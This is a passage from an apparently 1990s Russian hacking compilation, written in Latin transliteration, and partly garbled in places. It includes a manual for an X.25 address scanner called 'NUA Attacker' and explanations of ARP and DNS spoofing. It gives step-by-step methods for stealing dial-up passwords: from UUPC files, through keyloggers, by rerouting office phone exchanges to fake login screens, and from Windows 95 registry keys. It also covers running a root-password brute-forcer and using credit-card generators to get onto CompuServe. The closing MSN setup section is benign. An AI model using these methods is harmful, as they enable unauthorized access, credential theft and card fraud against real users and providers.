     Ending NUA: 619200.10
     to   programma   nachnet   skanirovanie  s  619100.10,  sleduyushchij  adres
skanirovaniya sootvetstvuet 619100.11, zatem pojdet 619100.12 i tak dalee.
     Pri   nastrojke   skanirovaniya  vy  mozhete  vospol'zovat'sya  sleduyushchimi
goryachimi klavishami:
     ESC
     Vyjti iz dialogovogo okna Setup attack  bez sohraneniya modificirovannyh
parametrov.
     LT-S
     Sohranit' modificirovannye parametry v pamyat' komp'yutera.
     Posle togo,  kak vy  vypolnite nastrojku  skanirovaniya, vy mozhete takzhe
sohranit' ee na  disk  vybrav iz menyu File komandu  Save options.  Pri  etom
sohranyatsya i vse modificirovannye parametry nastroek modema.
     Neskol'ko slov po povodu formata setevogo adresa
     Dopustim, chto vy proizveli nastrojku tak:
     Starting NUA: 6191 *WRONG*
     Ending NUA: 619100 *RIGHT*
     |to oznachaet,  chto skanirovanie  prohodit v diapazone s 6191  po 6199 s
propuskom 6200. Poetomu vy dolzhny nastroit' parametry skanirovaniya tak:
     Starting NUA: 619001 *RIGHT*
     Ending NUA: 619100 *RIGHT*
     To est', oba chislovyh polya dolzhny imet' odinakovuyu dlinu.
     Nastrojka modema
     Nastrojka modema osushchestvlyaetsya cherez dialogovoe okno Modem parameters.
     COM Port
     Port, kotoryj ispol'zuet vash modem.
     Baud Rate
     Skorost' peredachi dannyh v bodah
     (naprimer, 9600).
     Initialization
     Inicializaciya terminal'noj stroki pered nachalom skanirovaniya. |ta opciya
takzhe podderzhivaet Hayes-sovmestimye modemy.
     Dial Prefix
     Prefiks pered telefonnym nomerom.
     Dial Suffix
     Simvol, kotoryj  budet stoyat'  posle  telefonnogo  nomera.  |tot simvol
proshivaet vash modem sootvetstvuyushchim parametrom.
     Hangup
     Prervat' posledovatel'nost' peredavaemyh dannyh.
     Process skanirovaniya
     Vyberite opciyu Begin attack. Posle etogo proizojdet sleduyushchee:
     1. Inicializaciya modema.
     2. Nabor nomera Net. |tot nomer sootvetstvuet nastrojkam, proizvedennym
v dialogovom okne Setup attack.
     3. Ozhidanie priglasheniya TERMINAL= i zagruzka parametra  D1. Parametr D1
oznachaet, chto vash komp'yuter voshel v set'.
     4. Ozhidanie priglasheniya @.
     5.  Skanirovanie.  Skanirovanie  sootvetstvuet  parametru  Starting NUA
dialogovogo okna Setup attack.
     Posle togo, kak skanirovanie  setevyh adresov zakonchitsya, NUA  Attacker
vyjdet iz seti.
     V processe  skanirovaniya vy mozhete vospol'zovat'sya sleduyushchimi  goryachimi
klavishami:
     ALT-B
     Peredat' v Net signal, sootvetstvuyushchij preryvaniyu soedineniya.
     ALT-H
     Povesit'  trubku.  V  etom sluchae  programma  nachnet  rabotat' v rezhime
Pause.
     ALT-X
     Povesit' trubku, vyjti i prekratit' ataku.
     ESC
     Vremenno ostanovit' process skanirovaniya.
     V  processe  napadeniya  na  ekrane  vashego  monitora  budut  poyavlyat'sya
sleduyushchie soobshcheniya:
     Starting NUA
     Setevoj adres, kotoryj programma nachinaet skanirovat'.
     Ending NUA
     Otskanirovannyj setevoj adres.
     Connections
     Kolichestvo soedinenij, najdennoe v tekushchem skanirovanii.
     Current NUA
     Setevoj adres, kotoryj programma otskanirovala v dannyj moment vremeni.
     Log
     Logfile.
     NUA
     NUAfile.
     Time/Elapsed
     Tekushchee vremya i vremya skanirovaniya.
     Status
     Kod soedineniya i/ili sootvetstvuyushchaya informaciya o sostoyanii modema.
     Last
     Kod poslednego  soedineniya i/ili sootvetstvuyushchaya informaciya o sostoyanii
modema.
     V dialogovom okne Setup attack obratite vnimanie na pereklyuchatel' v Bad
Pad.  Esli vybrana  opciya  Y, eto  oznachaet, chto programma  posylaet  v set'
stroku  10  i  kazhdyj raz  zhdet dve sekundy do  teh  por, poka ne
poyavitsya  priglashenie  @  ili  TERMINAL=.  (to  est',  do   neposredstvennoj
registracii na Net). Nekotorye  klaviatury medlenno reagiruyut na registraciyu
v seti.  Osobenno eto  otnositsya  k  vysokim skorostyam.  Poetomu, esli vy ne
mozhete zaregistrirovat'sya, aktivizirujte parametr Y.
     Kreditnye kartochki i Internet
     Peresylaya  nomer  kreditnoj  kartochki  cherez Internet,  on  popadaet  k
prodavcu,  kotoryj proizvodit tak nazyvaemuyu avtorizaciyu (proishodit svyaz' s
organizaciej,   otvetstvennoj   za   obrabotku   tranzakcij).    V    sluchae
polozhitel'nogo  otveta  na  zapros,  neobhodimaya summa deneg  rezerviruetsya,
zakazannyj  tovar  otpravlyaetsya   pokupatelyu,  zatem   den'gi  snimayutsya  so
special'nogo bankovskogo scheta i perechislyayutsya na schet prodavca.
     Ponyatno,  chto  esli  avtorizaciya ne budet  osushchestvlena nemedlenno,  to
pokupatel'  mozhet  obmanut'  prodavca  putem  neskol'kih  zakazov  podryad  u
storonnih prodavcov.
     Problema  nemedlennoj  avtorizacii v  Internet  poka  eshche polnost'yu  ne
reshena (mnogie firmy ispol'zuyut obyknovennyj modem dlya  svyazi s processorom,
kazhdyj iz kotoryh, imeet, kak pravilo, raznyj format soobshchenij).
     V nastoyashchee vremya  kreditnye kartochki i Internet tesno svyazany s firmoj
CyberCash    (http://www.cybercash.com).   CyberCash   cherez   Public    Key
Cryptography  shifruet vsyu konfidencial'nuyu informaciyu,  kasayushchuyusya kreditnoj
kartochki,  svyaz'  s  processorami  osushchestvlyaetsya s  pomoshch'yu tak nazyvaemogo
central'nogo interfejsa CyberCash Gateway, pokupatel' installiruet  na  svoj
komp'yuter programmu CyberCash Wallet, kotoraya  v  zashifrovannom  vide hranit
nomer   kreditnoj  kartochki,   prodavec   osushchestvlyaet   svoyu   deyatel'nost'
posredstvom platezhnogo servera i standartnyh skriptov CGI.
     CompuServe i besplatnyj Internet
     CHerez CompuServ mozhno poluchit'  dostup k Internet. Dlya etogo neobhodimo
installirovat' Compuserve, zapustit' Membership Sign-Up, v razdele Strana ne
ukazyvat'  Rossiyu, poluchit' vremennyj parol' i login i dozvonit'sya k Infonet
po  odnomu  iz sleduyushchih  moskovskih telefonov: 9150001,  9150005,  9715101,
9150033.
     PlusCentro i besplatnyj Internet
     Na  serevere  PlusCentro   cherez  http://www.plus.centro.ru  sushchestvuet
gostevoj vhod. Na  samom dele eto vpolne funkcional'nyj dostup  k  Internet.
Neobhodimo tol'ko dozvonit'sya po odnomu  iz  sleduyushchih moskovskih telefonov:
4901595, 4909419, 4909363, 4909371, 4909491.
     Podrobnosti mozhno uznat' po etomu golosovomu telefonu: 4909424.
     Demos i besplatnyj Internet
     Kompaniya Demos pozvolyaet ispol'zovat' demonstracionnyj vhod v Internet.
Dlya  etogo  neobhodimo   dozvonit'sya  po   odnomu  iz  sleduyushchih  moskovskih
telefonov:  9613200,  2410505, 9566285,  9566286. V pole Login nuzhno vpisat'
_demo, a v pole Password nabivaetsya parol' v vide demo.
     Zashchita sistemy? Vsegda!
     Tak  nazyvaemyj  klass  zashchishchennosti  A  byl  opredelen  v  svoe  vremya
Ministerstvom oborony  SSHA v  znamenitoj  "Orange  book". Sejchas mnogie seti
baziruyutsya  na  neodnorodnyh  programmno-apparatnyh  sistemah  i  ispol'zuyut
slishkom  raznye  setevye  servisy. Tak  voznikayut  vpolne opredelennye  dyry
prakticheski na vseh urovnyah raboty seti, vklyuchaya verifikaciyu pol'zovatelej.
     Samaya   prostaya  zashchita  seti  mozhet  osushchestvlyat'sya  na  urovne  samoj
operacionnoj sistemy, baza kotoroj, sobstvenno, i est' set' (autentifikaciya,
avtorizaciya, razgranichenie dostupa, monitoring, audit).
     Vprochem,  nepravil'naya  konfiguraciya  takoj  sistemy  tut  zhe ostavlyaet
ogromnuyu bresh' v zashchite seti.
     Bolee  slozhnaya  zashchita  seti  uzhe  zavisit  ot professionalov,  kotorye
obsluzhivayut  set' i osushchestvlyayut poisk i  ispravlenie oshibok  v operacionnoj
sisteme  ili  korrektirovanie  nekotoryh  setevyh  ustanovok   po  umolchaniyu
posredstvom tak nazyvaemogo skanera bezopasnosti sistemy.
     Lozhnye DNS-zaprosy v Internet
     V lyubom konkretnom sluchae obmen datagrammami v Internet  osushchestvlyaetsya
mezhdu   dvumya   udalennymi  hostami   posredstvom  zagolovka  paketa  i  tak
nazyvaemogo polya dannyh.  Zagolovok -- eto, prezhde vsego, identifikaciya, a v
pole dannyh vhodit nekotoryj  paket vysokogo urovnya. V chastnom sluchae, lyuboj
IP-paket  vhodit  v  sostav protokola  transportnogo  urovnya  TCP.  S drugoj
storony, paket IP yavlyaetsya protokolom kanal'nogo urovnya lokal'noj seti, t.e.
mezhsetevym  protokolom,  kotoryj  pozvolyaet  peredavat' datagrammy  v  set'.
Vstaet  vopros  ob  adresacii  peredavaemyh  dannyh. Dlya  etogo ispol'zuetsya
32-razryadnnyj  adres togo  zhe  protokola  IP.  Kazalos'  by,  chto dostatochno
ukazat'  v  zagolovke IP  v standartnom  pole  Destination Address adres  IP
atakuemogo  uzla.  No  eto  ne tak.  Lyuboj  paket IP  uzhe soderzhitsya  vnutri
appartnogo paketa lokal'noj seti, t.e. lyubaya ataka  na  host nevozmozhna  bez
apparatnoj  adresacii peresylaemyh  datagramm.  |to oznachaet,  chto v prostom
sluchae (adresaciya  tol'ko v  odnoj podseti)  dlya ataki na host, kak minimum,
neobhodimo   znat'   ego   adres   lokal'noj   seti   (Ethernet-adres)   ili
sootvetstvuyushchij  adres  marshrutizatora. V  etom sluchae, pered  lyubym hakerom
vstaet problema udalennogo poiska informacii otnositel'no adresov  lokal'noj
seti.
     Pust'  na atakuemom uzle imeetsya  nekotoryj  algoritm udalennogo poiska
dannyh.  Togda haker  vybiraet segment seti, ispol'zuya dyryavyj protokol ARP,
(pust' dazhe tablica ARP v ustanovkah atakuemoj oprecionnoj sistemy nastroena
ves'ma korrektno) posylaet zapros  Ethernet  na  atakuemyj adres i  poluchaet
neobhodimoe sootvetstvie mezhdu adresami IP  i adresami lokal'noj seti. Nuzhno
skazat', chto  etot  zapros  yavlyaetsya  shirokoveshchatel'nym i  v nem ukazyvaetsya
adres marshrutizatora, yavlyayushchijsya adresom po umolchaniyu atakuemoj operacionnoj
sistemy. Marshrutizator, u kotorogo  vsegda imeetsya spisok ARP s  informaciej
(vse  dannye  vnosyatsya  posredstvom togo zhe  ARP-protokola) ob adrese  IP  i
adrese lokal'noj seti, poluchaet zapros, tut zhe vnosit sootvetstvuyushchuyu zapis'
o hoste hakera v  spisok  ARP i blagopoluchno otpravlyaet hakeru iskomyj adres
lokal'noj seti. |to tol'ko nachalo. Teper' haker perehvatyvaet  vyshenazvannyj
ARP-zapros i posylaet v set'  lozhnyj ARP-otvet, kotoryj, po suti, i yavlyaetsya
nichem inym, kak  hostom!  A  eto uzhe  oznachaet, chto  haker  vpolne  spokojno
kontroliruet setevoj trafik atakuemogo hosta.
     Itak,  haker  prisvaivaet  atakuemomu segmentu  seti  lozhnyj  IP-adres,
vhodit  v  set', nabivaet "tu  samuyu" komandu, ustanavlivaet  v operacionnoj
sisteme svoj adres IP, posylaet  uzhe v svoyu set' shirokoveshchatel'nyj zapros, a
tupoj marshrutizator bezukoriznenno  obnovlyaet  v svoem spiske  adresa  takim
obrazom, chto  lyubye setevye  pakety nachinayut  avtomaticheski napravlyat'sya  na
apparatnyj adres lokal'noj seti hakera.
     Tol'ko dva  sub®ekta znayut o tom, kto  poluchil shirokoveshchatel'nyj zapros
ARP. Imi yavlyayutsya haker  i  glupyj marshrutizator, na kotoryj prihodit paket,
neposredstvenno  napravlennyj na bezzashchitnyj ( pust' dazhe stoit  zanamenityj
FireFall-1 firmy Check Point Software Technologies) adres atakuemogo uzla. I
v samom  dele,  host-zhertva,  nichego ne podozrevaya (soglasno  ustanovkam  po
umolchaniyu setevoj operacionnoj sistemy) blagopoluchno peredaet  datagrammy na
hakerskij  uzel  ARP,  kotoryj, v  svoyu  ochered',  otsylaet  prinyatyj  paket
setevomu  marshrutizatoru, a tot,  ponyatno, dozhdavshis' otveta, otsylaet lyubuyu
informaciyu  uzhe ne cherez obmanutyj  host ARP,  a na  atakuemyj uzel. Tak kak
polnyj perehvat  paketov mezhdu lozhnym  serverom i  uzlom hakera  prohodit  v
promezhutochnoj stadii, to  voznikaet tak nazyvaemaya petlevaya  shema perehvata
informacii.  Polnyj  perehvat  vozmozhen lish'  v tom sluchae,  kogda hakerskij
server ARP  rabotaet po tak nazyvaemoj  mostovoj sheme  perehvata,  soglasno
kotoroj  v  kachestve  hakerskogo  zaprosa  ARP ukazyvaetsya  lyuboj  nezanyatyj
(proxy-server) IP-adres atakuemoj seti.
     Plavno  perehodim   k   DNS-serveram.  Poslednie  ispol'zuyut   v  svoih
obrashcheniyah k udalennym uzlam 32-bitnye adresa IP, mnemonicheski zaklyuchennye v
chetyrehrazryadnuyu  bukvennuyu kombinaciyu, ponyatnuyu kazhdomu lammeru. Lyuboj host
mozhet poluchit' sootvetstvuyushchij DNS u blizhajshego  informacionnogo servera DNS
po izvestnoj  sisteme Domain Name Server cherez  setevoj protokol DNS. Prosto
host  posylaet zapros na izvestnyj IP-adres DNS-servera  svoj IP-adres i imya
servera. Server  DNS shtudiruet sobstvennuyu bazu  dannyh, nahodit IP-adres  i
otpravlyaet na host sootvetstvuyushchij otvet DNS. Shema ves'ma primitivnaya. Esli
zhe server DNS ne nahodit iskomuyu bukvennuyu kombinaciyu, to on otsylaet zapros
na  tak  nazyvaemyj  kornevoj  server,  kotoryj,  v  svoyu  ochered',  sveryaet
informaciyu s fajlom nastroek root.cache. Tak proishodit do teh por, poka imya
hosta ne budet najdeno v Internet.
     Variant pervyj. Atakuemaya set' ozhidaet nekotoryj
     DNS-zapros. Haker sidit v  segmente seti  (t.e. on znaet  vse parametry
ISSa/ISSb)  ili  nahoditsya  na puti  setevogo udalennogo  traffika  (obychnoe
primenie ftp-komand get, put ili ls). Vnachale haker izvlekaet iz DNS-zaprosa
nomer  otpravitelya porta UDP. Uznav, takim obrazom, imya seti, haker posylaet
paket DNS  na zahvachennyj UDP-port i uzhe v etom pakete osushchestvlyaet podmenu,
i  v konechnom schete polnost'yu perehvatyvaet traffik mezhdu soboj  i udalennym
serverom.
     Variant vtoroj. Haker, maskiruyas' pod nastoyashchij
     DNS-server i ispol'zuya izvestnuyu dyrku (ogranichennost' identificiruemyh
paketov)  protokola UDP,  napryamuyu  peresylaet na  atakuemyj uzel  ne lozhnyj
zapros  DNS, a, naprotiv,  lozhnyj  DNS-otvet. Atakuemyj  server spokojnen'ko
prinimaet IP-adres  i,  esli  on  ne  sovpadaet  s  IP-adresom  DNS-servera,
DNS-otvet ne identichen  DNS-zaprosu,  DNS-otvet  popal v port DNS-zaprosa (v
krajnem sluchae haker prosto nachinaet perebirat' 1023 vzmozhnyh portov UDP) i,
esli pole identifikatora zaprosa identichno polyu dannyh  DNS-otveta, to haker
pronikaet v set' putem vnedreniya fiktivnogo DNS-otveta v atakuemyj host.
     Filipp Cimmermann i ego skandal'no izvestnoe detishche Pretty Good Privacy
     Rech'  idet  o  samom  moshchnom  instrumente  kriptograficheskoj  zashchity --
algoritme shifrovki PGP, mehanizm obrabotki klyuchej kotoroj produman nastol'ko
tshchatel'no, chto vzlom vozmozhen lish'  cherez  lobovuyu  ataku. Krome  etogo  PGP
ves'ma  populyaren  i  besplatno  rasprostranyaetsya  cherez  Internet.  Segodnya
algoritm  shifrovki  PGP  --  ne priznannyj  nekotorymi  oficial'nymi krugami
standart elektronnoj perepiski.
     PGP -  programma,  rabotayushchaya po  tak  nazyvaemoj  sheme  publichnogo  i
sekretnogo klyuchej.  Publichnyj klyuch  mogut  uznat' vse. Sekretnyj  --  tol'ko
konechnyj pol'zovatel' PGP. Novoe soobshchenie rasshifrovyvaetsya tol'ko cherez PGP
s pomoshch'yu vtorogo sekretnogo klyucha, t.e. soobshchenie zashifrovyvaetsya publichnym
klyuchom, otpravlyaetsya i zatem chitaetsya s ispol'zovaniem sekretnogo klyucha.
     PGP 5.0 dlya Windows 95 ili Macintosh mozhno legko skachat' s  populyarnogo
servera MIT.
     Vzlom Internet
     Pod  terminom vzlom Internet  podpazumevayut  neskol'ko pazlichnyh veshchej.
Vo-pepvyh: nezakonnoe podklyuchenie  k ppovajdepu i tak nazyvaemye  "halyavnye"
podklyucheniya.  Kak  eto osushchestvlyaetsya? Samyj  ppostoj vapiant --  vorovstvo.
Haker kradet chuzhoj  papol'. V nashe vpemya  ppi ogpomnom kolichestve  nedalekih
pol'zovatelej  hakeru  eto delo  ne  ppedstavlyaet  osobogo  tpuda,  tak  kak
podavlyayushchee bol'shinstvo pol'zovatelej  pol'zuetsya  takim populyapnym  paketom
e-mail kak UUPC CHepnova. A takzhe nekotopye ppovajdepy vse  eshche ppedostavlyayut
vhod v  sistemu kak online tak i offline pod  odnim i tem zhe papolem. Hakeru
ostaetsya samoe  ppostoe --  pepepisat' fajl init aka init1 s kataloga \UUPC.
Tam budet ppopisan kak login tak i password.
     Bolee slozhnye vapianty vzloma Internet -- zapusk na mashine pol'zovatelya
vipusnoj programmy ili pezidentnoj, otslezhivayushchej poyavlenie stpochki "ogin:".
Dalee v otdel'nyj fajl zapisyvayutsya vse nazhatiya klaviatury.
     Esli  pol'zovatel'  ispol'zuet   Windows  95  i  pabotaet  v  Netscape,
ispol'zuya SLIP i PPP, to haker obpashchaet vnimanie na skpipty komand  i fajl s
passhipeniem .pwl (papol' zashifpovannyj ppimitivnym metodom DES).
     Esli  na  mashinu  pol'zovatelya otsutstvuet dostup,  k  pesheniyu ppoblemy
haker   podhodit  dpugim  putem.  Bol'shaya  chast'  soedinenij  ppihoditsya  na
telefonnye linii.  Prakticheski v  lyubom krupnom ofise  toj ili inoj kompanii
imeetsya nebol'shaya ATS. Dlya hakera pepeppogpammipovat' ATS  tak chtoby, zvonki
s dannogo nomepa pepepouchivalis' na sebya, ne sostavlyaet osobogo truda. Dalee
zapuskaetsya tepminal'naya ppogpamma BBS s  zastavkoj ppovajdepa. Estestvenno,
pol'zovatel'  pokupaetsya i vvodit  login i  password.  Dalee vydaetsya  massa
oshibok, a zatem liniya razryvaetsya.
     Vzlom Internet 2
     Okazyvaetsya,   chto   v   Moskve  sushchestvuet   dva  neobychnyh   servera,
ppedostavlyayushchie  dostup  v  Internet,  prichem,  krome  obyknovennyh  yuzerov,
uslugami etih serverov pol'zuyutsya hakery, frikery i drugoj podobnyj narod.
     Rech' idet o CompuServe i America-On-Line.
     CompuServe  schitaetsya samoj legkoj sistemoj, t.e. legko lomayushchejsya. Dlya
etogo haker  nahodit  distributivnye diskety  s programmnym obespecheniem dlya
dostupa k  CompuServe  i  soft tipa CreditWizard ili Credit  Master Comfake,
zatem dozvanivaetsya do Scitor po telefonu 9563589 i  spokojno vhodit v set'.
Scitor,  kak  govoryat  hakery,  horosh  tem,  chto  dostup  k  resursam   seti
predostavlyaetsya cherez sgenerirovannyj vyshe opisannym  sposobom ekkaunt, v to
vremya kak SprintNet vysylaet informaciyu  o  logine i parole  pol'zovatelya na
adres elektronnoj pochty.
     V  Moskve  set'  America-On-Line  dostupna  cherez  SprintNet  (9280985,
9286344 ili 5789119).
     Neponyatno, o chem i chem dumayut sistemnye administratory etih serverov.
     Intellektual'nyj vzlomshchik Internet
     Lyudi  utverzhdayut, chto vzlomat' InterNet  vozmozhno,  a  drugie s krikami
"Lamers  must  die" pytayutsya dokazat',  chto eto prikol i sovsem ne  real'no.
Hakery utverzhdayut, chto prishlo vremya postavit' vse tochki nad i.
     Vzlom Internet vozmozhen!  Prichem  sdelat' eto mozhno ne buduchi hakerom i
ne obladaya kakoj-to dopolnitel'noj  informaciej -- dostatochno vospol'zovatsya
unikal'noj programmoj InterNet Cracker (nethackers@valimar.poltava.ua).
     Veroyatno,  ona   nikogda  ne  byla  by   predstavlena   shirokomu  krugu
pol'zovatelej i  tak by  i ostalas' lish'  dlya internal  usage,  no  ishodnye
teksty  programmy  byli  ukradeny i v  perekompilirovannom  vide, s ubrannym
avtorstvom, ee stali prodavat'.
     Kak rabotaet  eta  programma. Kogda pol'zovatel'  svyazyvaetsya  s  uzlom
Internet, dlya  vhoda neobhodimo vvesti login (identifikator pol'zovatelya)  i
password  (ego  parol').  V  Unix  sushchestvuyut   tak   nazyvaemye  hard-coded
(standartnye) identifikatory, poetomu dlya  vzloma  sistemy  hakeru  ostaetsya
lish' najti sootvetstvuyushchij parol'.
     InterNet Cracker pozvolyaet nahodit'  paroli dlya pol'zovatelya  s  imenem
root  pol'zuyas'   original'nym   metodom   brute-force   password   spoofing
NetHackers.
     Esli posle vvoda imeni  na zapros login, hakera prosyat vvesti Password,
to  eto i budet strokoj,  kotoruyu nuzhno  ukazat' programme.  Posle  zapuska,
programma ostaetsya  rezidentnoj v pamyati i  otslezhivaet poyavlenie na  ekrane
priglasheniya vvesti parol'. Zatem aktiviziruetsya procedura podbora.
     Primer:
     1) inetcrk.exe password
     2) haker soedinyaetsya s provajderom
     (lyubym DOS-terminalom)
     3) poyavlyaetsya zapros imeni login:
     4) haker vvodit root
     5) poyavlyaetsya stroka password:
     Esli vse sdelano pravil'no, budet  zapushchen glavnyj modul'  programmy. O
ego rabote budet  svidetel'stvovat' migayushchij ekran. Podbor parolej  nachalsya!
Process  podbora mozhet zanyat'  ot  1 do  5 minut, v zavisimosti  ot kachestva
svyazi i bystrodejstviya komp'yutera. Po okonchanii raboty na ekran budet vydano
neskol'ko   variantov  parolej.  Posle  etogo  haker  nemedlenno   preryvaet
soedinenie, chtoby na udalennom komp'yutere ne ostalos' sledov ego raboty.
     Esli v processe raboty proishodit obryv svyazi, to vse rezul'taty raboty
budut neverny. Kak pravilo, dlya  nahozhdeniya  dejstvitel'no nastoyashchego parolya
hakeru trebuetsya provesti neskol'ko takih seansov. Nizkij  procent popadanij
mozhet byt' svyazan s osobennostyami shifrovki parolej na uzle provajdera.
     Edinstvennym trebovaniem  dlya  raboty  programmy yavlyaetsya ee zapusk pod
operacionnoj  sistemoj MS-DOS. InterNet Cracker  ne mozhet  byt'  zapushchen pod
Windows i na komp'yutere na kotorom nahoditsya Windows, t.k. v processe raboty
ispol'zuyutsya  nedokumentirovannye  funkcii  DOS,  kotorye  ne   podderzhivaet
Windows.
     Besplatnyj Internet
     MTU Inform
     CHerez guest/mtu i dialup.mtu.ru
     Telefony: 9955555, 9955556.
     Caravan
     CHerez caravan/caravan www.caravan.ru
     Telefon: 9951070.
     Caravan 2
     CHerez caravan/free i DNS 194.190.218.2
     Telefon: 9951070.
     Caravan 3
     CHerez caravan/demo i DNS 193.232.120.226
     Telefon: 3324768.
     Caravan 4
     CHerez free/caravan
     Telefon: 3324768.
     Data Force
     CHerez 2889340 dlya polucheniya demonstracionnogo dostupa v set'
     Telefon: 9566749.
     Glas Net
     CHerez  demo/demo123 ili 2220990 dlya polucheniya demonstracionnogo dostupa
v set'
     Telefony: 7194457, 9274111, 9953535.
     IBM Net
     CHerez e-mail: ispp@patron.com dlya polucheniya demonstracionnogo dostupa v
set'
     Telefony: 2586435.
     Microdin
     CHerez guest/guest
     Telefon: 9951001.
     Demos
     CHerez _demo/demo
     Telefon: 9613200.
     Mega Electronics
     CHerez test/test ili guest/guest i www.mega.ru
     Telefon: 9951070.
     Paroli Windows 95 dlya Dial-Up Networking
     Paroli Windows 95 dlya Dial-Up Networking hranyatsya v zakodirovannom vide
v system.dat i user.dat. Odin  iz metodov vytaskivaniya parolya iz etih fajlov
proshche    vsego    sdelat'   s   pomoshch'yu    reestra.    Prosmatrivaem    klyuch
HKEY_USERS>Default>RemoteAccess>Addresses,   v    kotorom    propisany   vse
soedineniya Dial-Up  Networking  i  kopiruem ih.  Dalee  obrashchaemsya  k  klyuchu
HKEY_USERS>Default>RemoteAccess>Profiles i prosmatrivaem spisok profilej dlya
kazhdogo soedineniya. Kopiruem i ih. V  rezul'tate poluchaetsya neskol'ko fajlov
s rasshireniem .REG,  v kotoryh nahodyatsya vse nastrojki dlya soedinenij, v tom
chisle  i  zashifrovannye  paroli.  Perepisyvaem  ih  v  druguyu  papku uzhe  na
sobstvennyj  komp'yuter,  zapuskaem ih  cherez dvojnoj shchelchok myshi i  poluchaem
polnuyu kopiyu  Dial-Up Networking so  vsemi nastrojkami, nomerami, loginami i
parolyami.
     Cet' MSN
     MSN  mozhno  nazvat' global'noj  set'yu, tak  kak v etoj  seti vy  mozhete
otpravlyat'  i poluchat'  elektronnuyu pochtu,  podklyuchat'sya  k  konferenciyam  i
razgovoram, zagruzhat'  i  snimat' fajly. Pri  etom, zagruzhaemye vami  v set'
fajly   i  vasha   aktivnost'  v   hode  konferencij   i   razgovorov   mogut
rassmatrivat'sya, izmenyat'sya i stirat'sya bez uvedomleniya upravlyayushchim foruma.
     CHtoby nastroit'  parametry modema dlya  raboty v  MSN, neobhodimo dvazhdy
shchelknut' piktogrammu MSN na rabochem stole, nazhat' knopku Nastrojka i  prosto
perejti  k  nastrojke  modema.  Dialogovoe  okno  svojstv  modema  v  Paneli
upravleniya mozhno  ne ispol'zovat', tak kak parametry MSN imeyut bolee vysokij
prioritet.
     Esli u vas voznikli problemy  pri  popytke registracii  v MSN, znachit v
vashem regione otsutstvuet telefonnyj nomer dlya besplatnoj registracii.
     Poprobujte  v  dialogovom  okne  Nastrojka  podklyucheniya  nazhat'  knopku
Telefony, zatem knopku  Izmenit',  vybrat'  nomer vashego regiona i povtorit'
popytku soedineniya.
     Esli ustanovit'  soedinenie  tak  i  ne udaetsya,  obratites'  v  sluzhbu
podderzhki Microsoft.
     Konferencii  pol'zovatelej  MSN  neskol'ko  otlichayutsya  ot  konferencij
Usenet global'noj komp'yuternoj seti. V MSN gruppy konferencij yavlyayutsya odnoj
iz  uslug  seti  MSN.  Stat'i etih  konferencij nikem ne  recenziruyutsya i ne
predusmatrivayut kakoj-libo otvetstvennosti avtorov podobnyh statej.
     V  chastnosti, eto  oznachaet, chto  MSN  ne  imeet  sobstvennogo  servera
novostej s protokolom NNTP. Vy ne mozhete posredstvom prilozhenij tipa Trumpet
Newsreader ili Forte Agent poluchit' dostup k konferenciyam MSN.
     MSN sredi prochih vozmozhnostej vklyuchaet dostup k Internet. MSN polnost'yu
integrirovana s  obozrevatelem Microsoft Internet Explorer  4.0  i  snabzhena
ryadom funkcij, prizvannyh uluchshit' vashe setevoe puteshestvie.
     Esli vy  vidite  ALT  v papke \Internet  Newsgroups\Popular Newsgroups,
znachit  vy imeete polnyj dostup k resursam global'noj komp'yuternoj seti.  Po
umolchaniyu,  t. e. srazu  posle  ustanovki MSN, vy  imeete  lish' ogranichennyj
dostup k resursam Internet.
     Esli  u  vas net uchetnoj  zapisi v Internet, prosto zaregistrirujtes' v
Microsoft Network.
     Dlya etogo dostatochno  vospol'zovat'sya  raspolozhennym  na  rabochem stole
znachkom MSN i sledovat' poyavlyayushchimsya na ekrane ukazaniyam.
     CHtoby  vy smogli vojti v MSN  cherez  svoego postavshchika  uslug Internet,
korporaciya Microsoft razrabotala novuyu tehnologiyu dostupa Third Party Access
(TPA). |ta tehnologiya  pozvolyaet  vam  oplachivat' vremya, provedennoe  v seti
MSN, tol'ko vashemu provajderu.
     Vy mozhete poluchit' dostup k seti MSN iz Internet, ispol'zuya dazhe versiyu
MSN 1.2.
     CHtoby vojti  v  set' MSN cherez vashego  postavshchika  uslug  Internet,  on
dolzhen podderzhivat' protokol  Point-to-Point  Protocol  (PPP) bez kakih-libo
scenariev, t. e. v rezhime PPP ne dolzhno ispolnyat'sya nikakih komand. Esli vash
provajder otvechaet etim trebovaniyam, prodelajte sleduyushchie shagi:
     n Otkrojte papku Udalennyj dostup k seti i sozdajte
     soedinenie s vashim postavshchikom uslug Internet
     posredstvom mastera Novoe soedinenie
     n Ustanovite svyaz' s vashim provajderom i vojdite v
     Internet
     n Vojdite v rezhim komandnoj stroki MS-DOS i naberite
     ping www.msn.com. Esli vy poluchili dostup k web-uzlu
     MSN, to vy uvidite chto-to pohozhee na eto:
     Pinging machine-name IP-address with 32 bytes of data
     n Teper' shchelknite levoj klavishej myshi na piktogramme
     MSN, otkrojte dialogovoe okno svojstv Settings, vyberite
     connect Using Another Internet Access Provider, nazhmite OK,
     a zatem Connect
     Esli vy ispol'zuete  Microsoft Network  v kachestve dostupa k Internet i
yavlyaetes'  chlenom   MSN,  vy  mozhete  imet'  polnyj  dostup  k  konferenciyam
pol'zovatelej Internet  cherez MSN. S drugoj storony MSN i Microsoft Internet
Explorer ispol'zuyut razlichnye  protokoly  Usenet,  poetomu vy ne  smozhete  v
obozrevatele Microsoft  Internet  Explorer chitat'  i  publikovat'  stat'i  v
konferenciyah Internet cherez MSN.
     Ispol'zujte dlya etogo v MSN resurs Newsreader.
     Vy mozhete sovmestno  ispol'zovat' prilozhenie telnet, rabochee soedinenie
TCP/IP i set' MSN.
     Dlya dostupa v telnet cherez MSN vam neobhodimo:
     n Ustanovit' prilozhenie Udalennyj dostup k seti
     n Ustanovit' MSN 1.2 ili vyshe
     Zapustit'  iz  papki Windows utilitu telnet.exe  tol'ko posle togo, kak
budet realizovano soedinenie TCP/IP.
     Vy mozhete vojti v MSN  cherez vashego provajdera  ili  vojti  v  Internet
posredstvom uslug MSN. Dlya etogo otkrojte papku Set'.
     Ustanoviv komponenty  Klient dlya setej  Microsoft  Network,  Kontroller
udalennogo dostupa  i TCP/IP,  dobav'te  k  nim  protokoly NetBEUI i IPX/SPX
sovmestimyj protokol. V kontrollere udalennogo dostupa dlya TCP/IP v kachestve
tipa drajvera ukazhite Drajver NDIS dlya rasshirennogo rezhima, a sami  svojstva
protokola TCP/IP nastrojte tak:
     n IP-adres: Poluchit' IP-adres avtomaticheski
     n Privyazka: Klient dlya setej Microsoft Network
     n SHlyuz: Nezapolnennyj
     n Konfiguraciya WINS: Vklyuchite raspoznavanie WINS,
     dobav'te svoj server, naprimer 204.118.34.6 ili
